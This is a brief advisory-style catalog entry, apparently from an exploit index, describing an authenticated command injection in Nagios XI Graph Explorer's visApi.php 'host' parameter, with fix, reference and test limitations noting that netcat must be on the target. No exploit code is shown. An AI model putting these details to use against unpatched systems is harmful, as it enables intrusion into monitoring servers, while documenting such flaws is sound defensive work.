Nagios XI Graph Explorer Component OS Command Injection Vulnerability

Added: 01/23/2013
BID: 54263
OSVDB: 83552

Background

Nagios XI is a network host and service monitoring and management system.

Problem

Nagios XI Graph Explorer Component is vulnerable to arbitrary command execution by authenticated users. The vulnerability is due to the visApi.php script not sanitizing user-supplied input to the 'host' parameter.

Resolution

Upgrade to Nagios Graph Explorer SVN 1.3.

References

http://secunia.com/advisories/49749/

Limitations

This exploit has been tested against Nagios Enterprises Nagios XI 2011r1.9 on CentOS Project CentOS 6 with Exec-Shield Enabled.

This exploit requires valid Nagios web interface login credentials.

The Netcat (nc) utility tool must be installed on the target.

Platforms

Linux

Back to exploit index